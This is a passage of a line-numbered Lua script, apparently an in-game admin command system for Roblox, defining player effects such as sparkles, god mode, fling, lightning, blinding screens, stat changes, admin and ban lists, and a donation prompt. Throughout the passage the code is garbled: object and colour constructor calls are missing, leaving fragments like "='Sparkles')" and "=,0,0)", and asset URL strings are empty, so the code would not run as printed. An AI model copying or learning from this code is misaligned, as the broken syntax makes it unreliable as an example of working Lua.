  1776. for i, v in next, plrz do
  1777. if v.Character then
  1778. for x, z in next, v.Character:GetChildren() do
  1779. if z:IsA('BasePart') then local sparkle ='Sparkles')
  1780. sparkle.SparkleColor =, random:NextNumber(), random:NextNumber()) sparkle.Parent = z
  1781. end
  1782. end
  1783. end
  1784. end
  1785. end, 1, '!sparkly;plr')
  1787. addcommand('sparkles', 'Makes any player sparkly!', true, false, function(speaker)
  1788. if speaker.Character then
  1789. for x, z in next, speaker.Character:GetChildren() do
  1790. if z:IsA('BasePart') then local sparkle ='Sparkles')
  1791. sparkle.SparkleColor =, random:NextNumber(), random:NextNumber())  sparkle.Parent = z
  1792. end
  1793. end
  1794. end
  1795. end, 0, '!sparkles')
  1797. addcommand('unsparkles', 'Makes the player [speaker] unsparkly :c', false, false, function(speaker)
  1798. if speaker.Character then
  1799. for x, z in next, speaker.Character:GetChildren() do
  1800. if z:IsA('BasePart') then
  1801. for e, q in next, z:GetChildren() do
  1802. spawn(function() if q:IsA('Sparkles') then q.Enabled = false wait(3) q:Destroy() end end)
  1803. end
  1804. end
  1805. end
  1806. end
  1807. end, 0, '!unsparkles')
  1809. addcommand({'clearscripts', 'clrscripts'}, 'Clears all scripts [But not objects] [Experimental]', false, false, function(speaker)
  1810. for i, v in next, createdscripts do spawn(function() if v.Name == 'TRIP' or v.Name == 'FLY' or v.Name == 'NOCLIP' then v:ClearAllChildren() wait(.6) end v.Disabled = true v:Destroy() end) end
  1811. for i, v in next, createdscripts do if v.Name == ':Strobe' or v.Name == ':Rainbow' then v.Disabled = true v:Destroy() end end
  1812. for i, v in next, PlayersService:GetPlayers() do pcall(function() v.Character.Humanoid.PlatformStand = false end) end
  1813. wait(.6) LightingService.Ambient = LightingSettings.ambient LightingService.Brightness = LightingSettings.brightness LightingService.GlobalShadows = LightingSettings.globalshadows LightingService.OutdoorAmbient = LightingSettings.outdoorambient LightingService.TimeOfDay = LightingSettings.timeofday LightingService.FogColor = LightingSettings.fogcolour LightingService.FogEnd = LightingSettings.fogend LightingService.FogStart = LightingSettings.fogstart
  1814. end, 1, '!clearscripts')
  1816. addcommand({'clearobjects', 'clearassets', 'clrobjs', 'clrassets', 'clrobjects', 'clearobjs'}, 'Removes assets created by the admin [Experimental]', false, false, function(speaker)
  1817. for x = 1, #jailscreated do pcall(function() local zejail = jailscreated[x] zejail:Destroy() table.remove(jailscreated, x) end) end
  1818. for i, v in next, PlayersService:GetPlayers() do pcall(function() for c, d in next, v.Character:GetChildren() do if d:IsA('ForceField') or d.Name == 'SHIELD' then d:Destroy() end end end) end
  1819. for i, v in next, PlayersService:GetPlayers() do pcall(function() spawn(function() for x, z in next, clonescreated do z:Destroy() end if v.Character then local pos = v.Character:GetModelCFrame() v:LoadCharacter() repeat wait() until v.Character and v.Character:FindFirstChild('Humanoid') and v.Character.Humanoid.Health ~= 0 v.Character:WaitForChild('HumanoidRootPart').CFrame = pos end end) end) end
  1820. for i, v in next, createdscripts do if v.Name == 'LAGIFY' then v.Disabled = true v:Destroy() end end
  1821. for i, v in next, WorkspaceService:GetChildren() do if v.Name:lower():match('lag') then v:Destroy() end end
  1822. for i, v in next, objs do objs:Destroy() end
  1823. end, 1, '!clearobjects')
  1825. addcommand({'char', 'character'}, 'Turns a player into another player [By ID]', true, true, function(speaker, message)
  1826. pcall(function()
  1827. local chk = message:find(split)
  1828. local plrz = getplayer(speaker, message:sub(1, chk-1))
  1829. local plr = message:sub(chk+1)
  1830. if plr:lower() == 'thee' then plr = 17514438
  1831. elseif plr:lower() == 'shed' or plr == 'shedletsky' then plr = 261
  1832. elseif plr:lower() == 'owner' then plr = game.CreatorId
  1833. elseif plr:lower() == 'thee2' then plr = 20624713
  1834. elseif plr:lower() == 'person299' then plr = 214258
  1835. elseif plr:lower() == 'kohl' then plr = 153*110563
  1836. elseif plr:lower() == 'scripth' then plr = 44391621
  1837. end
  1838. for i, v in next, plrz do
  1839. spawn(function()
  1840. v.CharacterAppearanceId = tonumber(plr) or v.UserId
  1841. if v.Character then
  1842. local pos = v.Character:GetModelCFrame()
  1843. v:LoadCharacter()
  1844. repeat wait() until v.Character and v.Character:FindFirstChild('Humanoid') and v.Character.Humanoid.Health ~= 0
  1845. v.Character:WaitForChild('HumanoidRootPart').CFrame = pos
  1846. end
  1847. end)
  1848. end
  1849. end)
  1850. end, 1, '!char;plr;[id/keyword]')
  1852. addcommand({'unchar', 'uncharacter'}, 'Turns a player back into their original character', false, true, function(speaker, message)
  1853. local plrz = getplayer(speaker, message)
  1854. for i, v in next, plrz do
  1855. spawn(function()
  1856. v.CharacterAppearanceId = v.UserId
  1857. if v.Character then
  1858. local pos = v.Character:GetModelCFrame()
  1859. v:LoadCharacter()
  1860. repeat wait() until v.Character and v.Character:FindFirstChild('Humanoid') and v.Character.Humanoid.Health ~= 0
  1861. v.Character:WaitForChild('HumanoidRootPart').CFrame = pos
  1862. end
  1863. end)
  1864. end
  1865. end, 1, '!unchar;plr')
  1867. addcommand({'infect', 'zombie', 'infectify', 'zombify'}, 'Turns a player into a zombie', true, true, function(speaker, message) local plrz = getplayer(speaker, message) for i, v in next, plrz do if v.Character then infectplr(v) end end end, 1, '!infect;plr')
  1869. addcommand({'noob', 'noobify', 'n00b', 'n00bify'}, 'Turns a player into a fr00b', true, true, function(speaker, message) local plrz = getplayer(speaker, message) for i, v in next, plrz do if v.Character then noobplr(v) end end end, 1, '!noob;plr')
  1871. addcommand({'uninfect', 'unnoob', 'unn00b', 'unzombify', 'unn00bify', 'unnoobify'}, 'Turns a player back into a Ro-human', false, true, function(speaker, message)
  1872. local plrz = getplayer(speaker, message)
  1873. for i, v in next, plrz do
  1874. if v.Character and v.Character:FindFirstChild('Taggy', true) then
  1875. v:LoadCharacter()
  1876. end
  1877. end
  1878. end, 1, '!uninfect;plr, !unnoob;plr')
  1880. addcommand({'god', 'godify', 'immortal'}, 'Turns a player into a god', false, true, function(speaker, message)
  1881. local plrz = getplayer(speaker, message)
  1882. for i, v in next, plrz do
  1883. spawn(function()
  1884. if v.Character then
  1885. local ff ='ForceField') ff.Name = 'ADMIN:FF' ff.Visible = false ff.Parent = v.Character
  1886. local hum = v.Character:WaitForChild('Humanoid') hum.MaxHealth = math.huge hum.Health = hum.MaxHealth
  1887. local c = hum.HealthChanged:Connect(function() hum.MaxHealth = math.huge hum.Health = hum.MaxHealth end)
  1888. while not v.Character:FindFirstChild('UngodTagz') do wait() end
  1889. c:Disconnect() v.Character.UngodTagz:Destroy()
  1890. end
  1891. end)
  1892. end
  1893. end, 1, '!god;plr')
  1895. addcommand({'ungod', 'ungodify', 'mortal'}, 'Returns a player back into a imortal', false, true, function(speaker, message)
  1896. local plrz = getplayer(speaker, message)
  1897. for i, v in next, plrz do
  1898. spawn(function()
  1899. if v.Character then
  1901. wait(1)
  1902. for x, z in next, v.Character:GetChildren() do
  1903. if z:IsA('ForceField') then z:Destroy()
  1904. elseif z:IsA('Humanoid') then
  1905. z.MaxHealth = 100 z.Health = z.MaxHealth
  1906. end
  1907. end
  1908. end
  1909. end)
  1910. end
  1911. end, 1, '!ungod;plr')
  1913. addcommand('chaos', 'Turns a player into chaos personified', true, true, function(speaker, message)
  1914. local plrz = getplayer(speaker, message)
  1915. for i, v in next, plrz do
  1916. spawn(function()
  1917. if v.Character then
  1918. for x, z in next, v.Character:GetChildren() do
  1919. if z:IsA('BasePart') then
  1920. local fire ='Fire') fire.Color =,0,0) fire.SecondaryColor =,1,1) fire.Parent = z
  1921. z.Touched:Connect(function(hit)
  1922. if hit.Parent then
  1923. local plr = (function() for e,q in next, PlayersService:GetPlayers() do if q.Name == hit.Parent.Name then return q end end return nil end)() or nil
  1924. if not plr then plr = (function() for e,q in next, PlayersService:GetPlayers() do if q.Name == hit.Parent.Parent.Name then return q end end return nil end)() or nil end
  1925. if plr and plr.Character and (plr ~= speaker or plr.Name ~= speaker.Name) then
  1926. local hum = plr.Character:FindFirstChild('Humanoid')
  1927. if hum then hum.Health = 0 wait(1) if hum.Health ~= 0 then plr:LoadCharacter() end end
  1928. end
  1929. end
  1930. end)
  1931. end
  1932. end
  1933. LightingService:SetMinutesAfterMidnight(0) LightingService.FogEnd = 120
  1934. end
  1935. end)
  1936. end
  1937. end, 3, '!chaos;plr')
  1939. addcommand('gurl', 'Turns a player into a gurly man ;)', true, true, function(speaker, message)
  1940. local plrz = getplayer(speaker, message)
  1941. for i, v in next, plrz do
  1942. spawn(function()
  1943. if v.Character then
  1944. for x, z in next, v.Character:GetChildren() do
  1945. if z:IsA('Pants') or z:IsA('Shirt') or z:IsA('Accessory') then z:Destroy()
  1946. elseif z:IsA('BasePart') then z.BrickColor ='Pastel brown')
  1947. if z:FindFirstChild('face') then z.face.Texture = '' end
  1948. end
  1949. end
  1950.'Pants',v.Character).PantsTemplate = ''
  1951.'Shirt',v.Character).ShirtTemplate = ''
  1952. local hair = game:GetService('InsertService'):LoadAsset(439984886)
  1953. local hair2 = game:GetService('InsertService'):LoadAsset(220582246)
  1954. local hair3 = game:GetService('InsertService'):LoadAsset(361949697)
  1955. spawn(function() wait(.1) if #hair:GetChildren() ~= 0 then hair:GetChildren()[1].Parent = v.Character else hair:Destroy() end end)
  1956. spawn(function() wait(.1) if #hair2:GetChildren() ~= 0 then hair2:GetChildren()[1].Parent = v.Character else hair2:Destroy() end end)
  1957. spawn(function() wait(.1) if #hair3:GetChildren() ~= 0 then hair3:GetChildren()[1].Parent = v.Character else hair3:Destroy() end end)
  1958. game:GetService('Chat'):Chat(v.Character, 'Hi! ^^', 1)
  1959. end
  1960. end)
  1961. end
  1962. end, 1, '!gurl;plr')
  1964. addcommand('boi', 'Turns a player into a boi', true, true, function(speaker, message)
  1965. local plrz = getplayer(speaker, message)
  1966. for i, v in next, plrz do
  1967. spawn(function()
  1968. if v.Character then
  1969. for x, z in next, v.Character:GetChildren() do
  1970. if z:IsA('Pants') or z:IsA('Shirt') or z:IsA('Accessory') then z:Destroy()
  1971. elseif z:IsA('BasePart') then z.BrickColor ='Pastel brown')
  1972. if z:FindFirstChild('face') then z.face.Texture = '' end
  1973. end
  1974. end
  1975.'Pants',v.Character).PantsTemplate = ''
  1976.'Shirt',v.Character).ShirtTemplate = ''
  1977. local hair = game:GetService('InsertService'):LoadAsset(16101707)
  1978. local hair2 = game:GetService('InsertService'):LoadAsset(20642008)
  1979. spawn(function() wait(.1) if #hair:GetChildren() ~= 0 then hair:GetChildren()[1].Parent = v.Character else hair:Destroy() end end)
  1980. spawn(function() wait(.1) if #hair2:GetChildren() ~= 0 then hair2:GetChildren()[1].Parent = v.Character else hair2:Destroy() end end)
  1981. game:GetService('Chat'):Chat(v.Character, 'Wadup, peeps! <(*-*<)', 2)
  1982. end
  1983. end)
  1984. end
  1985. end, 1, '!boi;plr')
  1987. addcommand({'swag', 'swagify'}, 'Turns a player swagelicous ;)', true, true, function(speaker, message)
  1988. local plrz = getplayer(speaker, message)
  1989. for i, v in next, plrz do
  1990. spawn(function()
  1991. if v.Character then
  1992. for x, z in next, v.Character:GetChildren() do
  1993. if z:IsA('Pants') or z:IsA('Shirt') then z:Destroy()
  1994. elseif z:IsA('BasePart') then z.BrickColor ='Carnation pink')
  1995. --if z:FindFirstChild('face') then z.face.Texture = '' end -- Not sure if this command will this. ;-;
  1996. end
  1997. end
  1998.'Pants',v.Character).PantsTemplate = ''
  1999.'Shirt',v.Character).ShirtTemplate = ''
  2000. game:GetService('Chat'):Chat(v.Character, 'Swagelicous! ;)', 0)
  2001. end
  2002. end)
  2003. end
  2004. end, 1, '!swag;plr')
  2007. addcommand('megafart', 'Fart into the air and kill players by smell!', true, true, function(speaker, message)
  2008. local plrz = getplayer(speaker, message)
  2009. for i, v in next, plrz do
  2010. spawn(function()
  2011. if v.Character then
  2012. local fart ='Smoke') game:GetService('Debris'):AddItem(fart, 3) fart.Color =, 214/255, 0) fart.Opacity = 1 fart.RiseVelocity = .7 fart.Size = 7
  2013. pcall(function() fart.Parent = v.Character.HumanoidRootPart end)
  2014. local others = getplayer(speaker, 'others')
  2015. for x, z in next, others do
  2016. if z.Character then
  2017. local distance = (z.Character:GetModelCFrame().p-v.Character:GetModelCFrame().p).Magnitude
  2018. if distance < 7 and z.Character:FindFirstChild('Humanoid') then
  2019. z.Character.Humanoid:TakeDamage(distance/3.5)
  2020. end
  2021. end
  2022. end
  2023. for x = 1, random:NextInteger(25, 35) do
  2024. v.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame +, x, 0)
  2025. wait()
  2026. end
  2027. wait(10)
  2028. game:GetService('Chat'):Chat(v.Character, 'Pardon me. c;')
  2029. end
  2030. end)
  2031. end
  2032. end, 1, '!megafart;plr')
  2034. addcommand('itemorbit', 'Has an item magically float around a player :o', true, true, function(speaker, message)
  2035. pcall(function()
  2036. local chk = message:find(split)
  2037. local plrz = getplayer(speaker, message:sub(1, chk-1))
  2038. for i, v in next, plrz do
  2039. spawn(function()
  2040. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2041. local stoprunning = false
  2042. v.Character.Humanoid.Died:Connect(function() stoprunning = true end)
  2043. local item = game:GetService('InsertService'):LoadAsset(message:sub(chk+1))
  2044. wait(1)
  2045. if #item:GetChildren() ~= 0 then
  2046. local tehmesh = findchildofclass('Handle', true, item:GetChildren()[1])
  2047. if tehmesh then
  2048. local anew = tehmesh:Clone() anew.CanCollide = false anew.Anchored = true anew.Parent = v.Character
  2049. spawn(function()
  2050. while not stoprunning do wait()
  2051. for z = -1, 1, .01 do anew.CFrame = v.Character.HumanoidRootPart.CFrame *,z+3,-1) wait(1/48) end
  2052. for z = 1, -1, -.01 do anew.CFrame = v.Character.HumanoidRootPart.CFrame *,z+3,-1) wait(1/48) end
  2053. end
  2054. anew:Destroy()
  2055. end)
  2056. end
  2057. end
  2058. end
  2059. end)
  2060. end
  2061. end)
  2062. end, 1, '!itemorbit;plr')
  2064. addcommand('zeus', 'May Zeus have mercy on thy soul', true, true, function(speaker, message)
  2065. local plrz = getplayer(speaker, message)
  2066. for i, v in next, plrz do
  2067. spawn(function()
  2068. if v.Character then
  2069. local cloud ='Part') cloud.Size =, 3, 5) cloud.CFrame = v.Character:GetModelCFrame() -, -math.pi, 0) cloud.Anchored = true cloud.CanCollide = true cloud.BrickColor =, 1, 1)) cloud.Parent = v.Character
  2070. local lightning = cloud:Clone() lightning.BrickColor =,1,0))  lightning.Size =, 9e1, 2) cloud.Transparency = .333 lightning.Transparency = .111 lightning.CanCollide = false
  2071. lightning.Touched:Connect(function(hit) if hit and hit.Parent and hit.Parent:FindFirstChild('Humanoid') and (hit.Parent ~= speaker.Character or hit.Parent.Name ~= speaker.Name) then hit.Parent.Humanoid.Health = 0 end end)
  2072. local plrdye = false v.Character.Humanoid.Died:Connect(function() plrdye = true end)
  2073. spawn(function()
  2074. while not plrdye do
  2075. wait(random:NextInteger(1, 5))
  2076. local ran = random:NextInteger(1, 10)
  2077. if ran == 3 or ran == 6 then
  2078. lightning.Parent = v.Character
  2079. wait(2)
  2080. lightning.Parent = nil
  2081. end
  2082. end
  2083. end)
  2084. while not plrdye do
  2085. wait()
  2086. cloud.CFrame = v.Character.HumanoidRootPart.CFrame +, -math.pi-.777, 0)
  2087. lightning.CFrame = v.Character.HumanoidRootPart.CFrame +, -math.pi-(9e1/2), 0)
  2088. end
  2089. cloud:Destroy()
  2090. lightning:Destroy()
  2091. end
  2092. end)
  2093. end
  2094. end, 2, '!zeus;plr')
  2096. addcommand('boost', 'Sends a player into the air! :O', true, true, function(speaker, message)
  2097. local plrz = getplayer(speaker, message)
  2098. for i, v in next, plrz do
  2099. spawn(function()
  2100. if v.Character then
  2101. local exp ='Explosion') exp.DestroyJointRadiusPercent = 0 exp.BlastPressure = 0 exp.BlastRadius = 5 exp.ExplosionType = 0 exp.Position = v.Character:GetModelCFrame().p
  2102. for x = 1, 50 do
  2103. v.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame +
  2104. end
  2105. end
  2106. end)
  2107. end
  2108. end, 1, '!boost;plr')
  2110. addcommand('fling', 'Flings a player', true, true, function(speaker, message)
  2111. local plrz = getplayer(speaker, message)
  2112. for i, v in next, plrz do
  2113. spawn(function()
  2114. if v.Character and v.Character:FindFirstChild('Humanoid') then
  2115. local xran local zran -- Kohltastrophe ;)
  2116. repeat xran = random:NextInteger(-9999,9999) until math.abs(xran) >= 5555
  2117. repeat zran = random:NextInteger(-9999,9999) until math.abs(zran) >= 5555
  2118. v.Character.Humanoid.Sit = true v.Character.HumanoidRootPart.Velocity =,0,0)
  2119. local frc ="BodyForce", v.Character.HumanoidRootPart) frc.Name = "BFRC" frc.force =*4,9999*5,zran*4) game:GetService("Debris"):AddItem(frc,.1)
  2120. end
  2121. end)
  2122. end
  2123. end, 1, '!fling;plr')
  2125. addcommand('nether', 'Sends a player to the nether world', true, true, function(speaker, message)
  2126. local plrz = getplayer(speaker, message)
  2127. for i, v in next, plrz do
  2128. spawn(function()
  2129. if v.Character then
  2130. local hand ='Part') local handmesh ='SpecialMesh') handmesh.MeshId = '' handmesh.TextureId = '' handmesh.Scale =, 9, 9) handmesh.Parent = hand hand.Size =, 12, 12)
  2131. local hell ='Part') local hellmesh ='CylinderMesh') hellmesh.Parent = hell hell.Size =, 1, 12)
  2132. v.Character.HumanoidRootPart.Anchored = true
  2133. hell.Anchored = true hell.CanCollide = false hand.Anchored = true hand.CanCollide = false hell.BrickColor =, 0, 0)) hand.Parent = v.Character hell.Parent = v.Character
  2134. game:GetService('Chat'):Chat(hand, 'Welcome to Hell '..v.Name)
  2135. for x = -12, 5 do
  2136. hell.CFrame = v.Character.HumanoidRootPart.CFrame -, math.pi-.333, 0)
  2137. hand.CFrame = v.Character.HumanoidRootPart.CFrame +, x, 0)
  2138. v.Character.HumanoidRootPart.Anchored = true
  2139. wait(1/20)
  2140. end
  2141. v.Character.HumanoidRootPart.CFrame = hand.CFrame -, 2, 2)
  2142. wait(5)
  2143. for x = 0, 7 do
  2144. v.Character.HumanoidRootPart.Anchored = true
  2145. hand.CFrame = hand.CFrame -, x, 0)
  2146. v.Character.HumanoidRootPart.CFrame = hand.CFrame -, 2, 2)
  2147. wait(1/20)
  2148. end
  2149. v.Character.Humanoid.Health = 0
  2150. end
  2151. end)
  2152. end
  2153. end, 2, '!nether;plr')
  2155. addcommand('random', 'Random effect casted upon a player', true, true, function(speaker, message)
  2156. local plrz = getplayer(speaker, message)
  2157. for i, v in next, plrz do
  2158. spawn(function()
  2159. if v.Character then
  2160. local ran = random:NextInteger(1,5)
  2161. if ran == 1 then
  2162. pcall(function() v.Character.Humanoid.Health = 0 end)
  2163. elseif ran == 2 then
  2164. local xran local zran -- Kohltastrophe ;)
  2165. repeat xran = random:NextInteger(-9999,9999) until math.abs(xran) >= 5555
  2166. repeat zran = random:NextInteger(-9999,9999) until math.abs(zran) >= 5555
  2167. v.Character.Humanoid.Sit = true v.Character.HumanoidRootPart.Velocity =,0,0) v.Character.Humanoid.Changed:Connect(function() v.Character.Humanoid.Sit = true end)
  2168. local frc ="BodyForce", v.Character.HumanoidRootPart) frc.Name = "BFRC" frc.force =*4,9999*5,zran*4) game:GetService("Debris"):AddItem(frc,.1)
  2169. elseif ran == 3 then
  2170. local exp ='Explosion') exp.DestroyJointRadiusPercent = 0 exp.BlastPressure = 100 exp.BlastRadius = 5 exp.ExplosionType = 0 exp.Position = v.Character:GetModelCFrame().p
  2171. pcall(function() exp.Parent = v.Character.HumanoidRootPart end)
  2172. pcall(function() v.Character.Humanoid.Health = 0 end)
  2173. elseif ran == 4 then
  2174. for x, z in next, v.Character:GetChildren() do
  2175. if z:IsA('Humanoid') then z.Health = 0
  2176. elseif z:IsA('BasePart') then
  2177.'Fire', z)
  2178. end
  2179. end
  2180. elseif ran == 5 then
  2181. for i = 1, 5 do
  2182. createmessage({v}, 'TH4NX 4 T3H '..tostring(random:NextNumber())..' FW33 K0S LUL', false, 'H4X0RL0L', 1)
  2183. repeat wait() until v.Character and v.Character:FindFirstChild('Humanoid')
  2184. v.Character.Humanoid.Health = 0
  2185. local tag ="ObjectValue") tag.Name = 'creator' tag.Value = speaker tag.Parent = v.Character.Humanoid
  2186. wait(.777)
  2187. v:LoadCharacter()
  2188. end
  2189. end
  2190. end
  2191. end)
  2192. end
  2193. end, 2, '!random;plr')
  2195. addcommand('doom', 'The dark wind blows...', true, false, function(speaker)
  2196. local plrz = getplayer(speaker, 'others')
  2197. for i, v in next, plrz do
  2198. spawn(function()
  2199. createmessage({v}, 'The dark wind blows...', false, '[Wind]', 15)
  2200. local exp ='Explosion') exp.Position = v.Character:GetModelCFrame().p wait(3) exp.Parent = v.Character
  2201. end)
  2202. end
  2203. end, 2, '!doom')
  2205. addcommand({'change', 'chng', 'changestat', 'chngstat'}, 'Changes a player\'s leaderboard stat', false, true, function(speaker, message)
  2206. pcall(function()
  2207. local chk1 = message:find(split)
  2208. local chk2 = message:sub(chk1+1):find(split) + chk1
  2209. local plrz = getplayer(speaker, message:sub(1, chk1-1))
  2210. for i, v in next, plrz do
  2211. if v:FindFirstChild('leaderstats') then
  2212. for x, z in next, v.leaderstats:GetChildren() do
  2213. if z.Name:lower():sub(1, #message:sub(chk1+1, chk2-1)) == message:sub(chk1+1, chk2-1) then
  2214. pcall(function() z.Value = message:sub(chk2+1) end)
  2215. break
  2216. end
  2217. end
  2218. end
  2219. end
  2220. end)
  2221. end, 3, '!change;plr;stat;diffstat')
  2223. addcommand({'rstats', 'resetstats'}, 'Resets a player\'s stats', false, true, function(speaker, message)
  2224. local plrz = getplayer(speaker, message)
  2225. for i, v in next, plrz do
  2226. if v:FindFirstChild('leaderstats') then
  2227. for x, z in next, v.leaderstats:GetChildren() do
  2228. if z:IsA('NumberValue') or z:IsA('IntValue') then z.Value = 0
  2229. elseif z:IsA('StringValue') then z.Value = ''
  2230. end
  2231. end
  2232. end
  2233. end
  2234. end, 2, '!resetstats;plr')
  2236. addcommand({'blind', 'blindify'}, 'Blinds a player', true, true, function(speaker, message)
  2237. local plrz = getplayer(speaker, message)
  2238. for i, v in next, plrz do
  2239. spawn(function()
  2240. if v:FindFirstChild('PlayerGui') and chkadmin(v.Name, false) < 1 then
  2241. for x, z in next, createdguis do if z.Name:sub(1, 7) == 'GUIEFX:' and z.Name:sub(8) == 'BLIND:'..v.Name then z:Destroy() end end
  2242. local scr ='ScreenGui') scr.Name = 'GUIEFX:BLIND:'..v.Name scr.Parent = v.PlayerGui
  2243. local fra ='Frame') fra.BackgroundTransparency = 1 fra.Size =,0,10,0) fra.Position =,0,-4.5,0) fra.BackgroundColor3 =,0,0) fra.ZIndex = 7 fra.Parent = scr table.insert(createdguis, scr)
  2244. for x = 20, 0, -1 do fra.BackgroundTransparency = 1/20*x wait(1/44) end
  2245. end
  2246. end)
  2247. end
  2248. end, 2, '!blind;plr')
  2250. addcommand({'unblind', 'unblindify'}, 'Gives a player sight again', false, true, function(speaker, message)
  2251. local plrz = getplayer(speaker, message)
  2252. for i, v in next, plrz do
  2253. spawn(function()
  2254. if v:FindFirstChild('PlayerGui') then
  2255. for x, z in next, createdguis do if z.Name:sub(1, 7) == 'GUIEFX:' and z.Name:sub(8) == 'BLIND:'..v.Name then
  2256. for p = 0, 20 do pcall(function() z:GetChildren()[1].BackgroundTransparency = 1/20*p end) wait(1/44) end
  2257. z:Destroy()
  2258. end
  2259. end
  2260. end
  2261. end)
  2262. end
  2263. end, 1, '!unblind;plr')
  2265. addcommand('fixgui', 'Fixes a player\'s gui display', false, true, function(speaker, message)
  2266. local plrz = getplayer(speaker, message)
  2267. for i, v in next, plrz do
  2268. for x, z in next, createdguis do if z.Name:sub(1, 7) == 'GUIEFX:' and (z.Name:sub(8) == 'TRIPPY:'..v.Name or z.Name:sub(8) == 'BLIND:'..v.Name) then z:Destroy() end end
  2269. end
  2270. end, 1, '!fixgui;plr')
  2272. addcommand({'oldtrippy', 'otrippy'}, 'Makes a player all trippy! >-o', true, true, function(speaker, message)
  2273. local plrz = getplayer(speaker, message)
  2274. for i, v in next, plrz do
  2275. spawn(function()
  2276. if v:FindFirstChild('PlayerGui') and chkadmin(v.UserId, false) < 1 then
  2277. for x, z in next, createdguis do if z.Name:sub(1, 7) == 'GUIEFX:' and z.Name:sub(8) == 'TRIPPY:'..v.Name then z:Destroy() end end
  2278. local scr ='ScreenGui') scr.Name = 'GUIEFX:TRIPPY:'..v.Name
  2279. local fra ='Frame') fra.Size =,0,10,0) fra.Position =,0,-4.5,0) fra.BackgroundColor3 =,0,0) fra.BackgroundTransparency = .6 fra.Parent = scr
  2280. table.insert(createdguis, scr) scr.Parent = v.PlayerGui
  2281. repeat wait(1/44) fra.BackgroundColor3 =,random:NextNumber(),random:NextNumber()) until not fra or not fra.Parent or v.Character and v.Character:FindFirstChild('Humanoid') and v.Character.Humanoid.Health == 0
  2282. end
  2283. end)
  2284. end
  2285. end, 2, '!oldtrippy;plr')
  2287. addcommand({'unoldtrippy', 'unotrippy'}, 'Stops making a player all trippy', false, true, function(speaker, message)
  2288. local plrz = getplayer(speaker, message)
  2289. for i, v in next, plrz do
  2290. if v:FindFirstChild('PlayerGui') then
  2291. for x, z in next, createdguis do if z.Name:sub(1, 7) == 'GUIEFX:' and z.Name:sub(8) == 'TRIPPY:'..v.Name then z:Destroy() end end
  2292. end
  2293. end
  2294. end, 1, '!unoldtrippy;plr')
  2296. addcommand({'logs', 'chatlogs', 'clogs'}, 'Shows a list of logs', false, false, function(speaker)
  2297. local tehlogz = {}
  2298. for i, v in next, clogs do table.insert(tehlogz, {'['..v.TIME..'] ', v.SPEAKER..': '..v.MSG}) end
  2299. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'LOGS' box:ClearAllChildren() lt.Text = addskip('LOGS')
  2300. for i, v in next, tehlogz do
  2301. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v[1] ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  2302. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v[2] dsc.Parent = ntxt
  2303. end scr.Parent = speaker:WaitForChild('PlayerGui') wait(1/20) ls.Disabled = false
  2304. end, 1, '!logs')
  2306. addcommand({'admins', 'adminslist', 'adminlist'}, 'Shows a list of players who\'re admins', false, false, function(speaker)
  2307. local admintbl = {}
  2308. table.insert(admintbl, {'{TRUE}- '..(getname(game.CreatorId) or '[FAILED TO GET NAME]'), (getname(game.CreatorId) and getname(game.CreatorId)..' is a True Owner' or 'True Owner')})
  2309. for i, v in next, owneradmins do table.insert(admintbl, {'[OWNER]- '..v, v..' is an Owner'}) end
  2310. for i, v in next, superadmins do table.insert(admintbl, {'[SUPER]- '..v, v..' is a Super Admin'}) end
  2311. for i, v in next, admins do table.insert(admintbl, {'[ADMIN]- '..v, v..' is an Admin'}) end
  2312. for i, v in next, tempadmins do table.insert(admintbl, {'[TEMP]- '..v, v..' is a Temp Admin'}) end
  2313. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'ADMINS' box:ClearAllChildren() lt.Text = addskip('ADMINLIST')
  2314. for i, v in next, admintbl do
  2315. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v[1] ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  2316. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v[2] dsc.Parent = ntxt
  2317. end scr.Parent = speaker:WaitForChild('PlayerGui') txt:Destroy() wait(1/20) ls.Disabled = false
  2318. end, 1, '!adminlist')
  2320. addcommand({'bans', 'banlist', 'bannedlist', 'banland', 'bannedland', 'banland', 'banned'}, 'Shows a list of players who\'re admins', false, false, function(speaker)
  2321. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'BANLAND' box:ClearAllChildren() lt.Text = addskip('BANNEDLIST')
  2322. for i, v in next, bannedland do
  2323. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  2324. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v..' is banned from the game' dsc.Parent = ntxt
  2325. end scr.Parent = speaker:WaitForChild('PlayerGui') txt:Destroy() wait(1/20) ls.Disabled = false
  2326. end, 1, '!bannedlist')
  2328. if donations then addcommand('donate', 'Donate a little bit of cash to support the admin and its creator! :D', false, false, function(speaker) pcall(function() if WorkspaceService.AllowThirdPartySales then MarketplaceService:PromptGamePassPurchase(speaker, 1280765820) end end) end, 0, '!donate') end
  2330. addcommand('cape', 'Gives a player a majestic cape :o', true, true, function(speaker, message) -- For people who donated towards the admin, and admins! :D
  2331. pcall(function()
  2332. local chk = message:find(split)
  2333. local plrz = getplayer(speaker, message)
  2334. local cape = scriptsfolder:FindFirstChild('Cape')
  2335. local colour = nil; local decal = 000000
  2336. if chk then
  2337. plrz = getplayer(speaker, message:sub(1, chk-1))
  2338. if message:sub(chk+1):sub(1, 4) == 'thee' then colour =,1,1)) decal = 1282933061
  2339. elseif message:sub(chk+1):sub(1, 4) == 'kohl' then colour =,0,0)) decal = 108597653
  2340. elseif message:sub(chk+1) == 'superman' then colour =,0,1)) decal = 108597677
  2341. elseif message:sub(chk+1) == 'swag' then colour =,85/255,1)) decal = 109301474
  2342. elseif message:sub(chk+1) == 'batman' then colour =,0,0)) decal = 108597669
  2343. elseif,1):upper()..message:sub(chk+1):sub(2):lower()) then colour =,1):upper()..message:sub(chk+1):sub(2):lower())
  2344. end
  2345. end
  2346. for i, v in next, plrz do
  2347. spawn(function()
  2348. if v:FindFirstChild('PlayerGui') and cape then
  2349. local cape = cape:Clone()
